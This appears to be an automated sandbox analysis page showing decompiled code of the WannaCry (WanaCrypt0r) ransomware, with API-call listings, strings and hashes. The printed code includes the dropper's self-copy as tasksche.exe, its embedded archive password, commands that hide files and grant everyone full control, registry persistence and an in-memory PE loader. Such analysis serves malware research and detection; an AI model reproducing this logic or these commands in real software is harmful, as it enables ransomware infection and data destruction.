								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}





































                    0x00407136
                    0x00407136
                    0x00407140
                    0x00407148
                    0x0040714a
                    0x00407168
                    0x0040716b
                    0x0040716e
                    0x00407170
                    0x004071b7
                    0x004071c8
                    0x004071cd
                    0x004071cf
                    0x004071d3
                    0x004071d8
                    0x004071d8
                    0x004071d8
                    0x004071dc
                    0x004071dd
                    0x004071e1
                    0x004071ea
                    0x004071ec
                    0x004071fa
                    0x00000000
                    0x00407206
                    0x00000000
                    0x004071e3
                    0x004071e3
                    0x00000000
                    0x004071e3
                    0x004071e1
                    0x00407172
                    0x00407175
                    0x00407179
                    0x0040717e
                    0x0040717e
                    0x0040717f
                    0x00407181
                    0x00407185
                    0x00407188
                    0x0040715e
                    0x00000000
                    0x0040718a
                    0x0040718a
                    0x0040718d
                    0x00407196
                    0x00407196
                    0x00407198
                    0x0040719b
                    0x004071ad
                    0x004071b3
                    0x004071b6
                    0x00000000
                    0x004071b6
                    0x0040719e
                    0x00407195
                    0x00000000
                    0x00407195
                    0x00407190
                    0x00000000
                    0x00407190
                    0x00407188
                    0x0040714f
                    0x00407210
                    0x00407214
                    0x00407218
                    0x0040721d
                    0x0040721d
                    0x0040721e
                    0x00407220
                    0x00407223
                    0x00407227
                    0x0040722a
                    0x00000000
                    0x00407230
                    0x00407230
                    0x00407233
                    0x0040723c
                    0x0040723c
                    0x0040723e
                    0x00407241
                    0x00407255
                    0x0040725a
                    0x00407261
                    0x0040729c
                    0x0040729f
                    0x004072a9
                    0x004072ac
                    0x004072ae
                    0x004072b0
                    0x004072b2
                    0x004072b2
                    0x004072b4
                    0x00000000
                    0x00000000
                    0x004072b6
                    0x004072b8
                    0x004072be
                    0x004072be
                    0x004072c1
                    0x004072c1
                    0x004072c4
                    0x00000000
                    0x004072c4
                    0x004072ba
                    0x004072bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004072bc
                    0x004072cf
                    0x004072d5
                    0x004072d8
                    0x00407347
                    0x0040734f
                    0x00407356
                    0x0040737b
                    0x0040738f
                    0x0040739e
                    0x004073a3
                    0x00407312
                    0x00407312
                    0x0040732b
                    0x00407331
                    0x00407331
                    0x00407334
                    0x00407337
                    0x004073b3
                    0x004073b8
                    0x004073c0
                    0x004073c6
                    0x004073c9
                    0x004073ce
                    0x004073cf
                    0x004073cf
                    0x004073d5
                    0x004073d5
                    0x004073d5
                    0x004073d9
                    0x004073eb
                    0x004073ed
                    0x004073f0
                    0x004073f3
                    0x00000000
                    0x00000000
                    0x004073f5
                    0x004073f7
                    0x0040742a
                    0x0040742a
                    0x0040745a
                    0x0040745a
                    0x0040745e
                    0x00407463
                    0x00407463
                    0x0040746b
                    0x00000000
                    0x00407473
                    0x004073f9
                    0x00407415
                    0x00407415
                    0x00407419
                    0x00407454
                    0x00000000
                    0x00407454
                    0x0040741b
                    0x0040741d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040741f
                    0x0040740b
                    0x00407411
                    0x00407413
                    0x00407433
                    0x00000000
                    0x00407433
                    0x00000000
                    0x00407413
                    0x00407421
                    0x00000000
                    0x00407421
                    0x00000000
                    0x00407339
                    0x00407358
                    0x0040735f
                    0x00000000
                    0x00000000
                    0x00407361
                    0x00407368
                    0x004072e1
                    0x004072e7
                    0x004072fc
                    0x0040730a
                    0x0040730f
                    0x00000000
                    0x0040730f
                    0x0040736e
                    0x00407375
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407375
                    0x004072da
                    0x004072da
                    0x004072da
                    0x00000000
                    0x004072da
                    0x004072a1
                    0x00000000
                    0x004072a1
                    0x00407263
                    0x00407266
                    0x00000000
                    0x00000000
                    0x0040726c
                    0x0040726f
                    0x00407271
                    0x00407273
                    0x00407283
                    0x00407283
                    0x00407284
                    0x00407290
                    0x00407290
                    0x00000000
                    0x00407296
                    0x00407275
                    0x00407277
                    0x00000000
                    0x00000000
                    0x00407279
                    0x0040727b
                    0x00407288
                    0x00407288
                    0x00407288
                    0x0040728e
                    0x0040728f
                    0x00000000
                    0x0040728f
                    0x0040727d
                    0x00407281
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407281
                    0x00407244
                    0x0040723b
                    0x00000000
                    0x0040723b
                    0x00407236
                    0x00000000
                    0x00407236
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %s%s$%s%s%s$:$\
                    • API String ID: 0-1100577047
                    • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                    • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106stringfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}









                    0x00402040
                    0x00402054
                    0x0040208e
                    0x004020a3
                    0x004020b1
                    0x004020b3
                    0x004020bb
                    0x004020c3
                    0x004020c8
                    0x004020cf
                    0x004020d0
                    0x004020d5
                    0x004020e1
                    0x004020ed
                    0x004020f5
                    0x004020fa
                    0x004020fc
                    0x00402104
                    0x00402119
                    0x0040212a
                    0x00402134
                    0x0040214b
                    0x00402151
                    0x00402154
                    0x00402158
                    0x00402158
                    0x00402154
                    0x00402134
                    0x00402160
                    0x00402160
                    0x00000000
                    0x00402061
                    0x00402061
                    0x0040206f
                    0x0040207f
                    0x00000000
                    0x00402165
                    0x00402165
                    0x0040216b
                    0x0040216b
                    0x0040207f

                    APIs
                    • __p___argv.MSVCRT(0040F538), ref: 00402040
                    • strcmp.MSVCRT(?), ref: 0040204B
                    • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                    • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                      • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                    • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                    • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                    • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                      • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                      • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                      • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                    • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                    • API String ID: 1074704982-2844324180
                    • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                    • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}
















                    0x0040110f
                    0x00401116
                    0x00401118
                    0x0040111c
                    0x00401129
                    0x0040113a
                    0x0040113c
                    0x0040113e
                    0x0040114b
                    0x00401151
                    0x00401157
                    0x0040115c
                    0x00401164
                    0x0040116b
                    0x0040116c
                    0x00401175
                    0x0040116e
                    0x0040116e
                    0x0040116e
                    0x0040117a
                    0x00401183
                    0x0040118c
                    0x004011cf
                    0x004011e4
                    0x004011ee
                    0x004011f0
                    0x004011f1
                    0x004011fa
                    0x004011fa
                    0x0040118e
                    0x0040119a
                    0x004011bd
                    0x004011c7
                    0x004011c9
                    0x004011c9
                    0x00401203
                    0x0040120b
                    0x00401222
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040120b
                    0x0040120d
                    0x0040120d
                    0x00401210
                    0x00000000

                    APIs
                    • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                    • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                    • strlen.MSVCRT(?), ref: 004011A7
                    • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                    • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                    • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                    • String ID: 0@$Software\$WanaCrypt0r
                    • API String ID: 865909632-3421300005
                    • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                    • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}
















                    0x00401b68
                    0x00401b80
                    0x00401b87
                    0x00401b89
                    0x00401b95
                    0x00401b9c
                    0x00401b9e
                    0x00401ba0
                    0x00401bab
                    0x00401bb4
                    0x00401bb6
                    0x00401bca
                    0x00401bdd
                    0x00401be9
                    0x00401c04
                    0x00401c06
                    0x00401c19
                    0x00401c40
                    0x00401c53
                    0x00401c70
                    0x00401c38
                    0x00401c3a
                    0x00000000
                    0x00401c8f
                    0x00401c97
                    0x00401cb2
                    0x00401cbf
                    0x00401cc4
                    0x00401cd6
                    0x00401ce0
                    0x00000000
                    0x00401ce2
                    0x00401c70
                    0x00401c2c
                    0x00401c31
                    0x00401c36
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                    • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                    • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                    • String ID: %s\Intel$%s\ProgramData
                    • API String ID: 3806094219-198707228
                    • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                    • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}






























                    0x004021ef
                    0x004021f8
                    0x00402204
                    0x0040243d
                    0x00000000
                    0x0040243d
                    0x0040220a
                    0x00402212
                    0x00402239
                    0x00000000
                    0x00000000
                    0x00402242
                    0x0040224a
                    0x00000000
                    0x00402254
                    0x00402254
                    0x00402254
                    0x0040225a
                    0x00000000
                    0x00000000
                    0x0040225c
                    0x00402260
                    0x00402260
                    0x00402266
                    0x0040226a
                    0x0040228c
                    0x00402291
                    0x00402299
                    0x00000000
                    0x00000000
                    0x004022a7
                    0x004022aa
                    0x004022af
                    0x00000000
                    0x00000000
                    0x004022b9
                    0x004022bb
                    0x004022be
                    0x004022c1
                    0x004022c8
                    0x004022cb
                    0x004022d1
                    0x004022d7
                    0x00000000
                    0x00000000
                    0x004022e8
                    0x004022eb
                    0x004022ee
                    0x004022f0
                    0x004022f5
                    0x0040230f
                    0x0040231a
                    0x00402320
                    0x00402324
                    0x0040233d
                    0x00402340
                    0x0040234a
                    0x00402350
                    0x00402356
                    0x0040235c
                    0x00402362
                    0x00402368
                    0x0040236e
                    0x00402374
                    0x00402377
                    0x00402386
                    0x00402436
                    0x00402437
                    0x00000000
                    0x0040243c
                    0x00402396
                    0x0040239a
                    0x0040239d
                    0x004023a0
                    0x004023a7
                    0x004023ba
                    0x004023bc
                    0x004023bf
                    0x004023cc
                    0x00000000
                    0x00000000
                    0x004023d3
                    0x004023d3
                    0x004023d6
                    0x004023eb
                    0x004023ec
                    0x004023d8
                    0x004023e0
                    0x004023e6
                    0x004023e6
                    0x004023f8
                    0x00402414
                    0x00402419
                    0x0040244d
                    0x00402450
                    0x00000000
                    0x00402450
                    0x0040241e
                    0x00402448
                    0x00000000
                    0x00402448
                    0x00402420
                    0x00402421
                    0x00402424
                    0x00402429
                    0x00402441
                    0x00000000
                    0x00402441
                    0x00402430
                    0x00402430
                    0x00000000
                    0x004023f8
                    0x00402330
                    0x00402336
                    0x00402219
                    0x00402219
                    0x00000000
                    0x00402219
                    0x00402306
                    0x00402308
                    0x0040230d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040230d
                    0x0040226c
                    0x0040226f
                    0x0040226f
                    0x00402272
                    0x00402276
                    0x0040227c
                    0x00402278
                    0x00402278
                    0x00402278
                    0x00402281
                    0x00402283
                    0x00402283
                    0x00402286
                    0x00402289
                    0x00402289
                    0x00000000
                    0x0040226f
                    0x0040224a
                    0x00402214
                    0x00402219
                    0x00000000

                    APIs
                      • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                    • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                    • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                    • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                      • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                    • SetLastError.KERNEL32(0000045A), ref: 00402430
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
